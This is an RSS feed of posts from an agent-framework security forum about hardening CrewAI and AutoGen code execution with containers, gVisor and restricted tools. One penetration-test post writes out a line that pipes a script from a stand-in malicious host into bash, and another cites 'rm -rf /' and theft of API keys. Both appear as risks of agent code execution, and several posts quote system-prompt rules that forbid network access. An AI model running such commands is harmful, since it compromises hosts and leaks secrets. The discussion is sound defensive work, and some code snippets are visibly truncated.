<?xml version="1.0" encoding="UTF-8"?>        <rss version="2.0"
             xmlns:atom="http://www.w3.org/2005/Atom"
             xmlns:dc="http://purl.org/dc/elements/1.1/"
             xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
             xmlns:admin="http://webns.net/mvcb/"
             xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
             xmlns:content="http://purl.org/rss/1.0/modules/content/">
        <channel>
            <title>
									CrewAI and AutoGen Security - openclawsecurity.net Forum				            </title>
            <link>https://openclawsecurity.net/community/crewai-autogen-security/</link>
            <description>openclawsecurity.net Discussion Board</description>
            <language>en-US</language>
            <lastBuildDate>Tue, 29 Sep 2026 13:28:23 +0000</lastBuildDate>
            <generator>wpForo</generator>
            <ttl>60</ttl>
							                    <item>
                        <title>X vs Y: The cost of adding container isolation to CrewAI vs AutoGen</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/x-vs-y-the-cost-of-adding-container-isolation-to-crewai-vs-autogen/</link>
                        <pubDate>Wed, 15 Jul 2026 11:01:08 +0000</pubDate>
                        <description><![CDATA[A recurring pattern in our analyses of agent frameworks is the tension between rapid prototyping capabilities and the immediate, severe security debt incurred by their default execution mode...]]></description>
                        <content:encoded><![CDATA[A recurring pattern in our analyses of agent frameworks is the tension between rapid prototyping capabilities and the immediate, severe security debt incurred by their default execution models. Specifically, the architectural decision to allow untrusted code execution within the primary runtime—common in both AutoGen's code-running agents and CrewAI's task execution—presents a containment problem. The textbook mitigation is container isolation, but its implementation cost is not uniform across these frameworks.

The core of the discrepancy lies in their fundamental operational models. AutoGen's `AssistantAgent`, when equipped with the `code_execution_config` pointing to a local runtime, inherently executes generated code in the same environment as the orchestrator. To containerize this, one must effectively replace the default `execute_code` function with a mechanism that packages the code, communicates with a container manager (e.g., Docker Engine API), and retrieves results. This requires a custom agent subclass or a heavily wrapped runtime.

Consider a simplistic proof-of-concept for an AutoGen container bridge:
```python
def docker_executor(code: str):
    client = docker.from_env()
    container = client.containers.run(
        "python:3.11-slim",
        command=,
        detach=False,
        stdout=True,
        stderr=True,
        mem_limit="128m",
        network_mode="none"
    )
    result = container.wait()
    logs = container.logs().decode()
    container.remove()
    return logs

agent = AssistantAgent(
    name="containerized_coder",
    code_execution_config={
        "executor": docker_executor,
        "last_n_messages": 2
    }
)
```
The cost here is direct: you are now responsible for the container lifecycle, sanitizing inputs/outputs, managing filesystem volumes for persistence, and maintaining the container image. The framework provides no native orchestration for this.

Conversely, CrewAI's model, where `Agent` objects execute `Task` objects, abstracts the execution step to a `function`. This offers a marginally cleaner interception point. You can define a task's execution to be a call to a containerized service.
```python
from crewai import Agent, Task

def containerized_tool(problem):
    # Similar Docker API interaction, but structured around a specific tool/function.
    return docker_executor(f"print({problem})")

analyst = Agent(
    role='Security Analyst',
    goal='Analyze logs',
    backstory='An expert in threat detection.',
    tools=,
    verbose=True
)

task = Task(
    description='Process the given data: {input}',
    agent=analyst,
    tools=
)
```
However, this merely shifts the cost from the code-execution layer to the tool-design layer. Each tool requiring isolation necessitates its own secure wrapping. CrewAI's native support for tool definition does not include isolation primitives.

The aggregate costs can be itemized:
*   **Development Overhead:** Both frameworks require bespoke integration code, moving from a default, insecure `exec()` to a managed container system.
*   **Operational Complexity:** Introducing a container runtime as a dependency demands orchestration, image patching, and logging aggregation distinct from the agent logs.
*   **Performance Latency:** Container spin-up and teardown per execution (or per session) introduces orders of magnitude higher latency compared to in-process execution, drastically altering interaction design.
*   **State Management:** Ephemeral containers break agent state persistence, forcing explicit design of external knowledge stores—a concern absent in default, stateful sessions.

In essence, AutoGen's cost is paid at the point of its most dangerous feature (the code executor), while CrewAI's cost is distributed across its tooling ecosystem. Neither framework currently offers a first-class, secure-by-default isolation primitive, making the containerization cost a mandatory, non-trivial security tax for any production deployment. The choice between them may hinge on whether you prefer to pay this tax in a single, centralized location (AutoGen) or across a modular toolchain (CrewAI).

Lei]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Lei C.</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/x-vs-y-the-cost-of-adding-container-isolation-to-crewai-vs-autogen/</guid>
                    </item>
				                    <item>
                        <title>Just finished a penetration test on my AutoGen workflow — here&#039;s what I found</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/just-finished-a-penetration-test-on-my-autogen-workflow-heres-what-i-found/</link>
                        <pubDate>Tue, 14 Jul 2026 08:01:28 +0000</pubDate>
                        <description><![CDATA[Hey everyone, been heads-down in my home lab this week stress-testing my AutoGen setup. I was working on a financial analysis crew, and something about the way those code-executing agents we...]]></description>
                        <content:encoded><![CDATA[Hey everyone, been heads-down in my home lab this week stress-testing my AutoGen setup. I was working on a financial analysis crew, and something about the way those code-executing agents were firing off Python scripts made me nervous. So, I put on my hacker hat (the metaphorical one, from that DEF CON talk &#x1f609;) and ran a little penetration test.

The biggest shocker? The default `UserProxyAgent` with `code_execution_config` enabled is a wide-open door if you're not careful. I simulated a scenario where a malicious user input (or a compromised agent earlier in the chain) could pass a string like:

```python
import os
os.system('curl http://malicious-site/exploit.sh | bash')
```

And it just... ran. No questions asked. The agent happily executed it. The issue is that the `system` command inherits the full permissions of the Python process. In my case, that was my own user, but in a containerized setup, it could be root or have access to other services.

I found two main paths to lock this down:
1.  **Sandbox everything:** Run the entire AutoGen groupchat inside a Docker container with strict resource limits, no network access, and a read-only filesystem except for a tiny scratch directory.
2.  **Use the built-in safeguards more aggressively:** The `code_execution_config` has a `work_dir` and you can set `use_docker=True`. Even better, you can pass a `system_message` that strictly instructs the agent to never use `os.system`, `subprocess`, or similar modules, and to only use approved libraries.

For CrewAI, the risk feels different but just as real. It's all about role and permission design. A "Researcher" agent with permission to "delegate tasks" can effectively spawn work for any other agent in the crew. If you haven't explicitly defined what tasks are *off-limits*, you might have a Researcher asking your "Writer" agent to "write a phishing email draft" because it's technically a writing task.

The pattern I'm moving to is explicit allow-listing in the agent's role definition, both in CrewAI's `role` and in the LLM system prompt itself. Something like: "You are a Financial Data Analyst. You may only perform calculations, data cleaning, and generate charts. You are explicitly forbidden from writing external files, making network calls, or generating any form of communication."

Has anyone else done a deep dive on their own workflows? I'd love to compare notes on safe sandboxing techniques or how you're managing inter-agent trust. The power of these frameworks is incredible, but that default-unsafe posture keeps me up at night!

Carlos]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Carlos Mendez</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/just-finished-a-penetration-test-on-my-autogen-workflow-heres-what-i-found/</guid>
                    </item>
				                    <item>
                        <title>Walkthrough: Migrating an AutoGen workflow from full code execution to a restricted tool set</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/walkthrough-migrating-an-autogen-workflow-from-full-code-execution-to-a-restricted-tool-set/</link>
                        <pubDate>Fri, 10 Jul 2026 04:01:22 +0000</pubDate>
                        <description><![CDATA[A common security misconfiguration in AutoGen deployments is the default use of code execution agents, such as `AssistantAgent` with `code_execution_config` enabled. This pattern, while conv...]]></description>
                        <content:encoded><![CDATA[A common security misconfiguration in AutoGen deployments is the default use of code execution agents, such as `AssistantAgent` with `code_execution_config` enabled. This pattern, while convenient for prototyping, introduces an unacceptable risk profile for any operational workflow, as it grants the LLM the ability to run arbitrary Python code with the permissions of the host process.

The migration path involves replacing this open-ended execution with a strictly defined tool-calling interface. The core principle is to move from a model that says "execute any code you write" to one that says "you may only invoke these specific, reviewed functions." Below is a comparison of the default, unsafe pattern versus a restricted approach.

**Default, Unsafe Pattern:**
```python
from autogen import AssistantAgent, UserProxyAgent

user_proxy = UserProxyAgent(
    name="UserProxy",
    code_execution_config={"work_dir": "code"},
    human_input_mode="NEVER"
)
# This agent can write and execute any code within the work_dir.
```

**Restricted Tool-Calling Pattern:**
```python
from autogen import AssistantAgent, UserProxyAgent, register_function

# 1. Define a secure, auditable tool.
def query_database(sql_query: str) -&gt; str:
    # Implement with parameterized queries, connection pooling, etc.
    ...

# 2. Explicitly register the tool for the agents.
register_function(
    query_database,
    caller=assistant,  # The AssistantAgent that can request the tool
    executor=user_proxy, # The UserProxyAgent that will execute it
    name="query_database",
    description="Runs a SELECT query against the reporting database."
)

# 3. Create agents with code execution DISABLED.
assistant = AssistantAgent(
    name="Data_Assistant",
    llm_config={"tools": }, # Tool schema loaded here
    code_execution_config=False
)
user_proxy = UserProxyAgent(
    name="User_Proxy",
    human_input_mode="NEVER",
    max_consecutive_auto_reply=10,
    code_execution_config=False  # Critical: No arbitrary code execution.
)
```

Key migration steps:
*   Conduct an inventory of all code execution agents in your workflow.
*   For each required capability (file I/O, data query, API call), develop a dedicated Python function with strict input validation and sandboxing where applicable.
*   Register these functions as tools, explicitly binding caller and executor agents.
*   Disable `code_execution_config` on all agents. The workflow should now fail if the LLM attempts to generate arbitrary code, forcing all actions through the tool schema.
*   Generate an SBOM for the final toolset dependencies to track third-party risk.

This pattern significantly reduces the attack surface, constraining the agent's actions to a known set of operations. The next layer of hardening involves signing the tool function artifacts and implementing principal-based permission checks within each tool, ensuring that even a compromised agent token cannot exceed its intended data access boundaries.]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Grace W.</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/walkthrough-migrating-an-autogen-workflow-from-full-code-execution-to-a-restricted-tool-set/</guid>
                    </item>
				                    <item>
                        <title>Has anyone tried running AutoGen&#039;s code executor inside a gVisor sandbox?</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/has-anyone-tried-running-autogens-code-executor-inside-a-gvisor-sandbox/</link>
                        <pubDate>Wed, 08 Jul 2026 01:01:10 +0000</pubDate>
                        <description><![CDATA[The prevailing discourse around securing AutoGen&#039;s code execution agents often centers on containerization with Docker or, at best, a naive seccomp profile. While these provide a baseline, t...]]></description>
                        <content:encoded><![CDATA[The prevailing discourse around securing AutoGen's code execution agents often centers on containerization with Docker or, at best, a naive seccomp profile. While these provide a baseline, they insufficiently address the kernel attack surface, which is the primary concern when granting arbitrary code execution capabilities to an AI agent, even within a container.

I am evaluating a layered containment strategy. The core proposal is to run the AutoGen `UserProxyAgent` with `code_execution_config={"use_docker": false}` and instead direct its code execution to a subprocess that itself operates within a gVisor (runsc) sandbox. The hypothesis is that the Sentry system call filter and the guest kernel would provide a meaningful barrier against container escape attempts originating from the agent's generated code.

My preliminary configuration involves:
- A gVisor sandbox running a minimal container image (e.g., Alpine Python).
- A REST API or a wrapped script inside this sandbox to receive and execute code payloads from the host-side AutoGen agent.
- Strict network and filesystem namespace isolation for the sandbox.

Key risk assessment points I'm investigating:
* **Performance overhead:** The syscall latency introduced by gVisor is non-trivial. For long-running or computational tasks, this may be operationally prohibitive.
* **Filesystem bridging:** How to securely provide necessary context (files, data) to the sandboxed executor without creating a persistent, writable mount that becomes an exfiltration channel.
* **Tooling availability:** The sandboxed environment must still contain the necessary Python packages, system tools, or binaries the agent might reasonably request. This bloats the attack surface of the guest kernel.
* **Orchestration complexity:** This introduces a new failure mode and operational component, requiring monitoring and lifecycle management separate from the main application.

Has anyone implemented or tested a similar pattern? I am particularly interested in empirical data regarding:
- Any observed attempts by an agent (malicious or hallucinated) to break out of a standard Docker container that would have been mitigated by gVisor.
- The practical management of the "tool environment" within the sandbox without resorting to mounting `/usr/bin` or similar.
- Whether the added complexity yields a justifiable reduction in risk, or if a well-hardened Docker container (user namespaces, no-root, aggressive seccomp/AppArmor) provides diminishing returns.

The goal is a concrete cost-benefit analysis for high-assurance deployments.

-hl]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Henry Lau</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/has-anyone-tried-running-autogens-code-executor-inside-a-gvisor-sandbox/</guid>
                    </item>
				                    <item>
                        <title>Beginner question: What are &#039;unsafe defaults&#039; in AutoGen and how do I fix them?</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/beginner-question-what-are-unsafe-defaults-in-autogen-and-how-do-i-fix-them/</link>
                        <pubDate>Sat, 04 Jul 2026 06:01:03 +0000</pubDate>
                        <description><![CDATA[The main unsafe defaults in AutoGen revolve around the `GroupChatManager` and code execution agents. The framework prioritizes functionality over security out of the box, handing out excessi...]]></description>
                        <content:encoded><![CDATA[The main unsafe defaults in AutoGen revolve around the `GroupChatManager` and code execution agents. The framework prioritizes functionality over security out of the box, handing out excessive permissions.

**1. Code Execution Agents (`UserProxyAgent` with `code_execution_config`)**
The default setup runs code in the same process as your application, with the same privileges. No sandbox, no isolation.

```python
# DEFAULT, UNSAFE
agent = UserProxyAgent(
    name="code_executor",
    code_execution_config={"work_dir": "code"}
)
# This agent can run `os.system("rm -rf /")` or exfiltrate your API keys.
```

**2. Over-Privileged LLM Instructions**
System prompts for manager agents often lack security context, like "You can run any code to solve the task." Combined with the above, it's a free-for-all.

**Fixes:**

*   **For Code Execution:**
    *   **Isolate:** Use Docker via `code_execution_config={"use_docker": True}`. This is the minimum.
    *   **Restrict:** Create a custom `DockerCommandLineFunction` with a read-only volume and non-root user.
    *   **Audit:** Implement a code pre-check function to reject dangerous operations (e.g., import `os`, `subprocess`).
    ```python
    # SAFER SETUP
    code_execution_config={
        "use_docker": True,
        "docker_config": {"image": "python:3-slim", "user": "nobody"},
        "work_dir": "/tmp/scratch"
    }
    ```

*   **For Agent Privileges:**
    *   **Principle of Least Privilege:** Don't give code execution to every agent. Have a dedicated, tightly-controlled "executor" agent that others must request actions from.
    *   **Hardened System Prompts:** Add clauses like "You must not, under any circumstances, attempt to access the filesystem, network, or environment variables directly. All code execution must use the provided safe execution function."

*   **For GroupChatManager:**
    *   Explicitly define `llm_config` for the manager and remove any general `code_execution_config` from it. Its job is to route messages, not run code.

The core mistake is treating the agent system as a closed, trusted environment. It's not. Assume any LLM output is potentially malicious code targeting your infrastructure. Configure accordingly.]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Zoe M.</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/beginner-question-what-are-unsafe-defaults-in-autogen-and-how-do-i-fix-them/</guid>
                    </item>
				                    <item>
                        <title>Anyone else seeing memory leaks in AutoGen when running multiple code executors?</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/anyone-else-seeing-memory-leaks-in-autogen-when-running-multiple-code-executors/</link>
                        <pubDate>Fri, 03 Jul 2026 15:00:11 +0000</pubDate>
                        <description><![CDATA[Hey folks,

I’ve been deep in the weeds this week stress-testing some AutoGen group chats that involve multiple `AssistantAgent` instances with code execution enabled (via `code_execution_co...]]></description>
                        <content:encoded><![CDATA[Hey folks,

I’ve been deep in the weeds this week stress-testing some AutoGen group chats that involve multiple `AssistantAgent` instances with code execution enabled (via `code_execution_config`). I’m running a fairly complex simulation with a planner, a coder, and a verifier agent, all needing to run Python snippets. After a few hours and several hundred inter-agent messages, I'm observing what looks like a significant memory leak. The Python process just slowly balloons until it either hits my resource limits or performance degrades to a crawl.

This isn't just a "my machine" thing—I've replicated it on two different setups (one local, one cloud). It seems particularly tied to the code execution flow. If I run similar workloads with code execution disabled, the memory usage is stable. The moment I let those agents run `exec()` or spin up Docker containers (depending on config), the leak starts.

Here’s a simplified version of the setup I'm using:

```python
from autogen import AssistantAgent, UserProxyAgent, GroupChat, GroupChatManager

code_execution_config = {
    "work_dir": "coding",
    "use_docker": False,  # Also happens with Docker, sometimes worse
}

planner = AssistantAgent(
    name="planner",
    llm_config={"config_list": },
    code_execution_config=code_execution_config,
)
coder = AssistantAgent(
    name="coder",
    llm_config={"config_list": },
    code_execution_config=code_execution_config,
)

# ... GroupChat setup and initiation
```

My current hypothesis is that the code execution outputs, or perhaps the artifacts generated (files in `work_dir`), aren't being cleaned up properly between rounds. It might also be something lingering in the agent's internal message history, though I've tried clearing that manually without full resolution.

**What I've checked so far:**
*   It's not the LLM client's cache (tried with different backends).
*   The `work_dir` files are being written, but even manual deletion during runtime doesn't stop the leak.
*   Monitoring shows Python's `memory_profiler` points to steady growth in objects related to the agent conversation loops.

Is anyone else running into this? Specifically with **multiple** code-executing agents? I'm curious if:
1.  You've seen similar behavior.
2.  You've found any workarounds—like periodically restarting certain agents, or a specific config flag I've missed.
3.  You have theories on whether it's in the message history handling, the subprocess management for code exec, or something else.

This feels like a critical issue for any long-running, automated multi-agent system. If it's a known pattern, we should document a mitigation strategy. I'll be digging into the AutoGen source next week, but community intel would be invaluable.

- Tom (mod)]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Tom Mod</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/anyone-else-seeing-memory-leaks-in-autogen-when-running-multiple-code-executors/</guid>
                    </item>
				                    <item>
                        <title>Why is my CrewAI crew leaking the system prompt to all agents?</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/why-is-my-crewai-crew-leaking-the-system-prompt-to-all-agents/</link>
                        <pubDate>Fri, 03 Jul 2026 06:01:22 +0000</pubDate>
                        <description><![CDATA[I was reviewing the audit logs for my CrewAI crew this morning and noticed something concerning: every agent in the crew had access to the full, global system prompt in their message history...]]></description>
                        <content:encoded><![CDATA[I was reviewing the audit logs for my CrewAI crew this morning and noticed something concerning: every agent in the crew had access to the full, global system prompt in their message history. This seems like a significant information leak, especially when dealing with sensitive instructions or segmented knowledge.

Looking at my crew definition, I used the standard pattern from the tutorials:

```python
from crewai import Agent, Task, Crew, Process

manager = Agent(
    role="Project Manager",
    goal="Oversee the project",
    backstory="Experienced manager.",
    verbose=True
)

researcher = Agent(
    role="Researcher",
    goal="Find relevant information",
    backstory="Detail-oriented analyst.",
    verbose=True
)
```

The issue appears to be that when you don't explicitly provide a `system_prompt` to each individual agent, they default to using the crew's overarching prompt. This means the Researcher agent can potentially see instructions meant only for the Manager, like "you have final approval on budgets" or "do not share X with the other team members."

This is problematic for a few reasons:
* It violates the principle of least privilege.
* It breaks the intended role separation in a crew.
* It creates a risk of prompt leakage or manipulation in the agent's context window.

Has anyone else run into this? What's the recommended practice for scoping system prompts to individual agents in CrewAI to maintain proper isolation? I'm currently working around it by manually setting a unique `system_prompt` for each agent, but that feels like something that should be the default, secure behavior.]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Mary K.</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/why-is-my-crewai-crew-leaking-the-system-prompt-to-all-agents/</guid>
                    </item>
				                    <item>
                        <title>Just released an open-source tool to audit AutoGen agent capabilities</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/just-released-an-open-source-tool-to-audit-autogen-agent-capabilities/</link>
                        <pubDate>Fri, 03 Jul 2026 05:01:59 +0000</pubDate>
                        <description><![CDATA[Just finished a weekend project I wanted to share. I&#039;ve been digging into AutoGen&#039;s security model, specifically around those powerful `UserProxyAgent` and `AssistantAgent` with code executi...]]></description>
                        <content:encoded><![CDATA[Just finished a weekend project I wanted to share. I've been digging into AutoGen's security model, specifically around those powerful `UserProxyAgent` and `AssistantAgent` with code execution. The defaults are, frankly, terrifying for any kind of production-adjacent use. &#x1f605;

I built a simple static analysis tool, `autogen-audit`, that parses an AutoGen agent configuration and flags high-risk settings. It focuses on the capability model. Here's the core idea:

```python
# Example of what it flags
risky_config = {
    "name": "CoderAgent",
    "system_message": "You are a helpful assistant.",
    "code_execution_config": {
        "work_dir": ".",
        "use_docker": False,  # &#x1f6a8; Flagged: Missing Docker isolation
        "last_n_messages": 3
    },
    "human_input_mode": "NEVER"  # &#x1f6a8; Flagged: No human oversight
}
```

The tool checks for:
- Code execution enabled without Docker isolation.
- Missing `human_input_mode` on code-executing agents (autonomous loops).
- Overly permissive `work_dir` paths (e.g., "/", "~").
- Default `llm_config` allowing unlimited tool use.

It's not a runtime sandbox—that's a separate layer needing seccomp or AppArmor. This is about catching misconfigurations before you deploy. Found it super useful for my own team's setup; we were accidentally running with `use_docker: false` in a staging environment.

You can find it on GitHub under `openclaw-security/autogen-audit`. It's a simple Python script. Would love feedback, especially on what other static checks would be valuable. Anyone else looking at CrewAI's role/permission design? I'm thinking of adding support for their `allow_delegation` and `function_calling_llm` checks next.

-- peter]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Peter Chang</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/just-released-an-open-source-tool-to-audit-autogen-agent-capabilities/</guid>
                    </item>
				                    <item>
                        <title>How to prevent AutoGen agents from exfiltrating data through the network?</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/how-to-prevent-autogen-agents-from-exfiltrating-data-through-the-network/</link>
                        <pubDate>Fri, 03 Jul 2026 05:00:22 +0000</pubDate>
                        <description><![CDATA[Hey everyone, new to the forum and diving into AutoGen. I&#039;ve been setting up some multi-agent workflows locally, and a question keeps nagging at me.

I understand that `UserProxyAgent`s with...]]></description>
                        <content:encoded><![CDATA[Hey everyone, new to the forum and diving into AutoGen. I've been setting up some multi-agent workflows locally, and a question keeps nagging at me.

I understand that `UserProxyAgent`s with code execution can run `requests.get()` or use other Python modules to make network calls. Even a simple `AssistantAgent` could, in theory, generate a code block that the `UserProxyAgent` would then execute, potentially sending data out.

I want to sandbox these agents to prevent any unauthorized data exfiltration. My goal is to allow them to compute and talk to each other, but block all network egress from the agent's execution environment, unless it's to a specific, allowed internal service (like a local LLM).

I'm thinking about using Docker to containerize the whole AutoGen runtime. What would be the best practice here?

1.  Is it enough to run the AutoGen script inside a container with `--network=none`? Or would that break inter-agent communication if they're separate processes?
2.  Should I be looking at Linux network namespaces or `iptables` rules on the host instead?
3.  How do you handle cases where an agent *needs* to fetch something from a known, safe API? Is a proxy the only secure pattern?

Here's a super basic Docker setup I'm considering, but I'm unsure about the networking part:

```dockerfile
FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Is --network=none the right flag to use at runtime?
CMD 
```

I'd really appreciate some step-by-step guidance or examples of how you've locked this down in your own projects. My expertise is more in basic Docker and Linux, so the deeper security mechanics are a bit new to me.

Thanks - Jay]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Jay Kim</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/how-to-prevent-autogen-agents-from-exfiltrating-data-through-the-network/</guid>
                    </item>
				                    <item>
                        <title>Check out my talk at BSides on abusing AutoGen&#039;s insecure tool calling</title>
                        <link>https://openclawsecurity.net/community/crewai-autogen-security/check-out-my-talk-at-bsides-on-abusing-autogens-insecure-tool-calling/</link>
                        <pubDate>Thu, 02 Jul 2026 17:00:10 +0000</pubDate>
                        <description><![CDATA[Just gave a talk at BSides. The video&#039;s up. If you&#039;re using AutoGen&#039;s built-in code execution agents, you&#039;re probably already owned.

They hand the LLM a Python REPL by default. No sandbox. ...]]></description>
                        <content:encoded><![CDATA[Just gave a talk at BSides. The video's up. If you're using AutoGen's built-in code execution agents, you're probably already owned.

They hand the LLM a Python REPL by default. No sandbox. No container. Just `subprocess.run` and `exec()`. The permission model is a joke—a list of "safe" modules you can extend. Everyone extends it. The system prompt says "don't do bad things" and that's the whole security boundary.

CrewAI isn't much better. Their "role" and "goal" system does nothing for actual permissions. Agents share memory, tools are all-or-nothing. It's delegation theater.

Real autonomy means accepting the risk, not pretending it away with config flags. But these frameworks sell you a car with no seatbelts and call it a feature.

Watch the talk. Burn your default configs.

/dev/null]]></content:encoded>
						                            <category domain="https://openclawsecurity.net/community/crewai-autogen-security/">CrewAI and AutoGen Security</category>                        <dc:creator>Dave &#039;R00t&#039; Miller</dc:creator>
                        <guid isPermaLink="true">https://openclawsecurity.net/community/crewai-autogen-security/check-out-my-talk-at-bsides-on-abusing-autogens-insecure-tool-calling/</guid>
                    </item>
							        </channel>
        </rss>
		